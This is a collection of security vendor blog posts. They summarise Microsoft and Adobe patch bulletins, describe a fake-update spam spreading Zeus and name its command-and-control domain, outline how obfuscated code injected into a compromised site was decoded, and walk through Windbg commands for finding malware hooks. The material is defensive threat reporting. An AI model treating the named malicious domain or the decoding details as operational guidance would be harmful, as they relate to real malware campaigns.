This month, Microsoft issued 5 security bulletins covering 15 vulnerabilities in Excel and Windows. These updates are considered important rather than critical, as by the time of the patch there was no malicious code exploiting the vulnerabilities in the wild. Adobe also released a security bulletin patching 13 vulnerabilities in Acrobat Reader. Websense® Security Labs highly recommends applying the updates in order to avoid cyber criminals who may use these security holes for their malicious activities.

Arguably the most important bulletin is MS11-072, which targets five different vulnerabilities in Microsoft Office. An attacker could use any of these to execute arbitrary code on the computer with the same access rights as the user. This is a focus for any security researcher as hackers are constantly looking for newer ways to distribute their badware. Such issues are probably getting more and more headlines as Adobe's sandboxing system and regular security patches seem to be paying off, meaning an up-to-date system is much less prone to successful exploits by vulnerabilities in PDFs.

This does not mean, of course, that we will see no more vulnerabilities in Acrobat Reader. This Tuesday Adobe Issued a security bulletin too, fixing 13 vulnerability issues in their product. Each of the vulnerabilities could allow an attacker to execute a code on the host computer allowing them to take full control of it. This patch is rated as critical, therefore it is strongly recommended to apply it.

Also worth mentioning is that many companies have updated their DigiNotar certificates - Microsoft, Adobe, and even Mozilla Firefox issued the updates. Firefox even released an additional security patch targeting this issue. Please check that you have applied the latest updates so you are fully protected.

Is your organization using the latest Firefox 6 or Internet Explorer 9? Which one did you find more secure? Give us your thoughts in the comments.

Vulnerabilities patched by Microsoft on 13 September 2011:

MS11-070 WINS Local Elevation of Privilege Vulnerability (CVE-2011-1984)

MS11-071 Windows Components Insecure Library Loading Vulnerability (CVE-2011-1991)

MS11-072 Excel Use after Free WriteAV Vulnerability (CVE-2011-1986)

MS11-072 Excel Out of Bounds Array Indexing Vulnerability (CVE-2011-1987)

MS11-072 Excel Heap Corruption Vulnerability (CVE-2011-1988)

MS11-072 Excel Conditional Expression Parsing Vulnerability (CVE-2011-1989)

MS11-072 Excel Out of Bounds Array Indexing Vulnerability (CVE-2011-1990)

MS11-073 Office Component Insecure Library Loading Vulnerability (CVE-2011-1980)

MS11-073 Office Uninitialized Object Pointer Vulnerability (CVE-2011-1982)

MS11-074 XSS in SharePoint Calendar Vulnerability (CVE-2011-0653)

MS11-074 HTML Sanitization Vulnerability (CVE-2011-1252)

MS11-074 Editform Script Injection Vulnerability (CVE-2011-1890)

MS11-074 Contact Details Reflected XSS Vulnerability (CVE-2011-1891)

MS11-074 SharePoint Remote File Disclosure Vulnerability (CVE-2011-1892)

MS11-074 SharePoint XSS Vulnerability (CVE-2011-1893)

Vulnerabilities patched by Adobe on 13 September 2011:

Local privilege-escalation vulnerability (Adobe Reader X (10.x) on Windows only) (CVE-2011-1353).

Security bypass vulnerability that could lead to code execution (CVE-2011-2431).

Buffer overflow vulnerability in the U3D TIFF Resource that could lead to code execution (CVE-2011-2432).

Heap overflow vulnerability that could lead to code execution (CVE-2011-2433).

Heap overflow vulnerability that could lead to code execution (CVE-2011-2434).

Buffer overflow vulnerability that could lead to code execution (CVE-2011-2435).

Heap overflow vulnerability in the Adobe image parsing library that could lead to code execution (CVE-2011-2436).

Heap overflow vulnerability that could lead to code execution (CVE-2011-2437).

Stack overflow vulnerabilities in the Adobe image parsing library that could lead to code execution (CVE-2011-2438).

Memory leakage condition vulnerability that could lead to code execution (CVE-2011-2439).

Use-after-free vulnerability that could lead to code execution (CVE-2011-2440).

Stack overflow vulnerabilities in the CoolType.dll library that could lead to code execution (CVE-2011-2441).

Logic error vulnerability that could lead to code execution (CVE-2011-2442).

Websense Security Labs and our ThreatSeeker Network are constantly monitoring for these threats occurring in the wild.

Websense Security Labs™ ThreatSeeker® network has noticed a low-volume threat circulating as a Microsoft update with a very low detection.  This attack ties in almost perfectly with the release of patches on the upcoming "Patch Tuesday" from Microsoft.  The attack lures the unsuspecting user into following the link provided within the email message, which evidently infects their system as it downloads a malicious executable to the user's machine. The executable (the fake patch) is being hosted on a compromised domain and at the time of writing holds an 11% detection rate as seen here on VirusTotal.

Websense customers are protected by our Advanced Classification Engine - ACE.

The email message looks quite legitimate, as the display names within the headers actually say they originate from Microsoft Canada (spoofed).  Other attributes of the message include a sense of urgency with the subject: "URGENT: Critical Security Update". The body of the message is presented in two different languages (English and French): indicative of some effort being put into the creation, making it look more legitimate and targeting a larger audience. Installing the fake patch will result in an infected machine with the Zeus Trojan variant: the Trojan variant calls home to its command & control server at visitortracker.net.in .

Below we have the contents of the message together with the body.

Just as a heads up of what to expect of this "Patch Tuesday"; it's a pretty small update as Microsoft will release only two updates to patch two undisclosed vulnerabilities: a Critical update affecting MS Windows and an Important update affecting MS Office.

System administrators and security experts are focusing on Patch Tuesday every month (also known as Microsoft Black Tuesday or MS Tuesday). This time Microsoft patched many important vulnerabilities, but have they fixed all currently known zero days? Let's find out.

This time, on February 8th, Microsoft released 12 security bulletins fixing various vulnerabilities, including three critical ones. Possibly the most important is the 0-day found recently in the Graphics Rendering Engine (GRE) and another 0-day that affects the Cascading Style Sheet (CSS) handler in Internet Explorer. The software giant also fixed a critical vulnerability in their OpenType Compact Font Format (CFF) driver. 

A further 9 important bulletins were also included in this update, therefore it is highly recommended that users update all servers and workstations to avoid becoming a victim of an online crime.

Some of the vulnerabilities included in this Tuesday Patch can be remotely exploited, while others need local access to the computer by the attacker. As the cyber criminal does not need to physically meet the victim for a remote exploit, a user is more vulnerable to this type of attack. Websense ThreatSeeker Network detects thousands of compromised Web sites every day, leading to one of these malicious sites which then exploits unpatched vulnerabilities and gains full access to the unaware user's computer.  Websense Security Gateway and Websense Hosted Services are protecting customers against this type of attack; however, it is very good practice to keep servers and workstations up to date.

The bulletins and vulnerabilities in detail:  

Three critical vulnerabilities have been patched:

• MS11-003: Cumulative update which fixes four vulnerabilities in Internet Explorer. These vulnerabilities could allow an attacker to run any code on a computer without the user's consent while browsing a malicious or compromised Web site. The four vulnerabilities include:
  • CVE-2010-3971 - CSS Memory Corruption Vulnerability (0-day)
  • CVE-2011-0035 - Uninitialized Memory Corruption Vulnerability
  • CVE-2011-0036 - Uninitialized Memory Corruption Vulnerability
  • CVE-2011-0038 - Internet Explorer Insecure Library Loading Vulnerability

• MS11-006: Fixes a full disclosed critical vulnerability in Graphics Rendering Engine (GRE) in many Windows versions, including Windows XP, Server, and Vista. The vulnerability could allow an attacker to execute arbitrary code on a computer while the user is viewing a specifically-crafted thumbnail image. See this blog for further details. The following vulnerability has been patched:
  • CVE-2010-3970 - Windows Shell Graphics Processing Overrun Vulnerability (0-day)

• MS11-007: Security update for a non-disclosed vulnerability in the Compact Font Format (CFF), which affects Windows versions, including Windows XP, Server, and Windows 7. The vulnerability could allow an attacker to execute arbitrary code on a computer while the user is viewing content which includes a specifically-crafted OpenType font. The following vulnerability has been patched:
  • CVE-2011-0033 - OpenType Font Encoded Character Vulnerability

Nine non-critical, but important security patches:

• MS11-004: This bulletin patches a vulnerability in Microsoft Internet Information Services (IIS) FTP Service, which could allow an attacker to execute a code on the FTP server using a malicious FTP command. Since FTP Service is not installed by default on IIS, this update was categorized as "Important" only. The following vulnerability has been patched:
  • CVE-2010-3972 - IIS FTP Service Heap Buffer Overrun Vulnerability (0-day)

• MS11-005: This is a security update for the vulnerability found in Active Directory. The vulnerability could allow a cyber criminal to attack an Active Directory server causing Denial of Service, however, the attacker needs to join their domain first and must have administrator privileges on that domain. Because of this, this vulnerability is not critical.
  • CVE-2011-0040 - Active Directory SPN Validation Vulnerability

• MS11-008: This bulletin resolves two non-disclosed vulnerabilities in Microsoft Visio. The vulnerability could allow an attacker to execute arbitrary code on the computer while the user is viewing a specifically crafted Visio file. The following vulnerabilities have been patched:
  • CVE-2011-0092 - Visio Object Memory Corruption Vulnerability
  • CVE-2011-0093 - Visio Data Type Memory Corruption Vulnerability

• MS11-009: This one fixes a non-disclosed vulnerability in the JScript and VBScript Scripting Engines. The vulnerability could allow an attacker to gather information from the user's computer while the user is visiting a malicious Web site. A typical trick to get a user to visit one of these Web sites is sending a spam or phishing e-mail with the link. The following vulnerability has been patched:
  • CVE-2011-0031 - Scripting Engines Information Disclosure Vulnerability

•  MS11-010: Another non-disclosed vulnerability which affects the Microsoft Windows Client/Server Run-time Subsystem (CSRSS) in Windows XP and Windows Server 2003. This vulnerability could allow a criminal an Elevation of Privilege type of attack on a local computer by retrieving sensitive logon information from the user while they are logging on and off. Doing this, an attacker could gain privileges from other users including the administrator. The following vulnerability has been patched:
• CVE-2011-0030 - CSRSS Elevation of Privilege Vulnerability

•  MS11-011: This is a cumulative update correcting two different vulnerabilities. Both of them could allow a criminal an Elevation of Privilege type of attack on a local computer by running a specifically-crafted application. The following vulnerabilities have been patched:
  • CVE-2010-4398 - Driver Improper Interaction with Windows Kernel Vulnerability
  • CVE-2011-0045 - Windows Kernel Integer Truncation Vulnerability

• MS11-012: This cumulative update fixes another Elevation of Privilege type of vulnerability, where the attacker could gain privileges from other users including the administrator. For this the attacker needs to be able to log on to the computer and run a specifically-crafted application. The following vulnerabilities have been patched:
  • CVE-2011-0086 - Win32k Improper User Input Validation Vulnerability
  • CVE-2011-0087 - Win32k Insufficient User Input Validation Vulnerability
  • CVE-2011-0088 - Win32k Window Class Pointer Confusion Vulnerability
  • CVE-2011-0089 - Win32k Window Class Improper Pointer Validation Vulnerability
  • CVE-2011-0090 - Win32k Memory Corruption Vulnerability

• MS11-013: This bulletin patches Windows Kerberos.  The vulnerability could allow a cyber criminal to attack and forge service tickets in Kerberos server, gaining privileges from other users including the administrator. However, the attacker needs to join their domain first and must have administrator privileges on that domain. Because of this, this vulnerability is not critical. The following vulnerabilities have been patched:
  • CVE-2011-0043 - Kerberos Unkeyed Checksum Vulnerability
  • CVE-2011-0091 - Kerberos Spoofing Vulnerability

• MS11-014: This non-disclosed vulnerability is a yet another Elevation of Privilege type, that affects the Local Security Authority Subsystem Service (LSASS) in Windows XP and Windows Server 2003. The vulnerability could allow an attack on a local computer by running a specifically-crafted application on it. For this the attacker first needs valid credentials to be able to log on to the computer and run applications. The following vulnerability has been patched:
  • CVE-2011-0039 - LSASS Length Validation Vulnerability

As we have seen a couple of times in previous MS Tuesday bulletins, once again we have a very important security patch set. It contains many critical and high severity fixes, resolving many vulnerabilities used by ongoing attacks actively. WebsenseLabs therefore highly recommends applying the patches as soon as you can to improve immunity against these kinds of strikes.

Websense Security Labs™ ThreatSeeker™ Network has detected that Articlealley.com has been compromised and injected with obfuscated code.

Article Alley is a free article directory that aims to help authors promote and syndicate their content. It allows authors and promoters to get their articles out on the Web with the potential of being read by millions of readers. This site was compromised from the root domain, and as a result all subsequent sub-pages were infected by the attack.

Screenshot of the infected site:

Screenshot of injected code:

After de-obfuscation, the redirection chain shown below verifies that this reached the final page but was still highly encrypted.

On first glance, the malicious code is fairly extensive and complex, but the decryption method used is quite simple.  First we use '%' to replace all instances of 'SS KWKW o' in the two long variables. The next step is to use the Unescape() function to decode the two variables by running it twice.

Snapshot of the decrypted code:

The attack is targeting the Microsoft Help and Support Center 0-day vulnerability CVE-2010-1885, which you can get more details of here.

At the time of publishing this blog, the site has been cleaned and the malicious code removed.

 Websense Messaging and Websense Web Security customers are protected against this attack.

Websense® Security Labs™ ThreatSeeker™ Network was busy last weekend, and detected 3 spam campaigns with millions of emails.

Confirm Twitter password, and Twitter security model setup

As variants of the Reset Your Twitter Password spam we blogged last week, these continued the attack and increased it in scale from 55,000 to 170,000. We have seen quite a few different subjects, including the 2 below which are the most frequently seen.

Facebook account deactivated, or invited by somebody famous?

Over 144,000 of this kind of spam email have been caught by our Hosted Email Security system. When a user visits the fake Facebook link offered in the email, their system is compromised by the Eleonore Exploit Kit and eventually is turned into a bot.

Outlook Setup Notification

At the time this post was written, over 106,000 instances of this campaign have been caught in our system, and the number is still increasing.

The statistics below show that spam increased by 15,700 daily on average during the weekend, compared to work days. It seems that some spammers didn't take a break last weekend.

Websense Messaging and Websense Web Security customers are protected against these attacks.

We have been seeing reverse engineering on malware for a while. Some time ago you needed to have magic tools from some underground hackers, but the situation has changed a lot since then. This is especially true for reverse engineering on the Windows platform, where there are a lot of good Microsoft-made tools. They are not specifically made for reverse engineering purposes, but they can be very helpful for reverse engineering binaries. They are also very stable because they went through a lot of internal quality assurance processes before being released to the public.

It feels like these Microsoft-made tools are underestimated. Many hackers are using ollydbg instead of Windbg. Many people are using some other dumping tools to dump processes instead of userdump. And so on. It's not that ollydbg or other tools aren't good. I just want to show how easily the same thing can be achieved with the tools released by Microsoft. I'll show two things: dumping processes, and finding rootkit components embedded in the process images. Both of these can be achieved with just a few lines of commands.

The situation is as follows. We have a machine infected with a malware, a kind of a Zbot variant. We know the malware is doing code injections to collect and control the data flow on the system. So we decide to dump the process image. How can this be achieved with Microsoft tools? We just need to download and install User Mode Process Dumper Version 8.1 on the target system. Here's an example showing the dump of the infected "svchost.exe" process image from the system.

Illustration 1: Using userdump to dump live process images

You just need to call userdump.exe with the target process name and target dump file name. It will go through every process with that specific name and dump the image to a file with the name you designated plus the process ID. In one shot, you can grab all the dump files for each process with same name. Convenient, right? One more benefit of userdump is that it will not kill the process it dumped. So theoretically, the process will not be affected by dumping the images. We can silently duplicate the process images and let the system carry on without intervention.

So now we have the corpse images of the processes and it's time to do some basic autopsy work to see which organs have been tweaked by this infectious botnet client. First, you need a tool called Debugging Tools for Windows (aka Windbg). There are, however, some issues with the Windbg download. The last release date for the standalone download package is March 2009, which is more than a year ago. You need to download and install WDK to use the latest Windbg. But in my case, I was just fine with the March 2009 release. And the examples here will work without any problems with standalone packages.

Just move all the dmp files acquired from userdump to a safe location. Launch Windbg and select File > Open Crash Dump. Then choose the dump file you want to analyze.

If you come from the ollydbg world, the first thing you'll notice is the UI. It doesn't have a fancy GUI like ollydbg. You need to know the debugging commands to achieve anything, even simple things. This can be a big hurdle for the people who are accustomed to full-blown GUI debuggers. But there are still many advantages to this command line approach. You can copy and paste the commands easily. And you can save all the data in a text file for further review. Everything you do inside the debugger is logged, and you can keep those logs as your record. Also Windbg supports a kind of a semi-scripting like the "Debugger Command Program", which makes your life easier if you are performing simple tedious repeating tasks.

We will use this small portion of the Windbg script feature to find the hooks installed on the target process. The following one-line command will reveal every hook (especially if they are inline hooks):

!for_each_module !chkimg @#ModuleName -d

!for_each_module is a kind of extension command. Every command that starts with "!" is an extension. It executes the following command for every module on the target process.

The command to execute for each module is "!chkimg @#ModuleName -d". !chkimg is a command that compares the image on the memory and symbol file or executable file. @#ModuleName will be replaced with the module name that is being executed. The command "!chkimg" will compare the image with the one in the symbol store. In this case, we should use the symbol store from Microsoft. If you don't have your symbol path configured, execute the following command from inside the Windbg command prompt:

.sympath+ SRV*C:\localsymbols*http://msdl.microsoft.com/download/symbols

"C:\localsymbols" can be replaced with any local directory that you want to use for symbol cache files.

Here's the result of that "!for_each_module" command with the  "!chkimg" command. Basically, it will iterate through all the modules loaded in the process and check the executable image against the one stored in the Microsoft symbol store. If anything has been modified, it will report the discrepancies.

Illustration 2: The section inside the red square shows the APIs where the malicious hook is installed

From the above picture, you can see that a lot of APIs from ws2_32.dll (winsock) and wininet.dll have been modified. You can quickly see that this malware is monitoring and modifying the network traffic by hooking network-related APIs.

For example, let's look into WSASend API from the ws2_32.dll file. You can use the "u" command to disassemble any portion of the memory. Here, we disassemble the "WSASend" API. The first instruction of the API is a jmp instruction to the memory location 0x00b7dbbd.

Illustration 3: ws2_32!WSASend inline hook installed

We disassemble that part of the memory using the  "u"(disassemble) command. You can see that it's a kind of hooker function.

Illustration 4: Hooker function

By examining the properties of the memory region containing 0x00b7dbbd using the "!address" extension command, we can see that the protection flag has "Execute" and "ReadWrite" bits set. It's usually "ReadOnly" with the "Execute" bit set for the usual executable modules loaded. This might be a heap region and the hooker module might be injected from another process.

Illustration 5: Memory property of region containing the hooker function.

That's it for today. We have showed how to use one-line commands to dump processes, and how to use Windbg to inspect hooks or rootkits installed on the process. The next step will be analyzing the hooker functions themselves. There will be more on this subject in a future blog posting, and it will involve using IDA and IDAPython and the command line version of Windbg.

Thanks, and have a great reversing!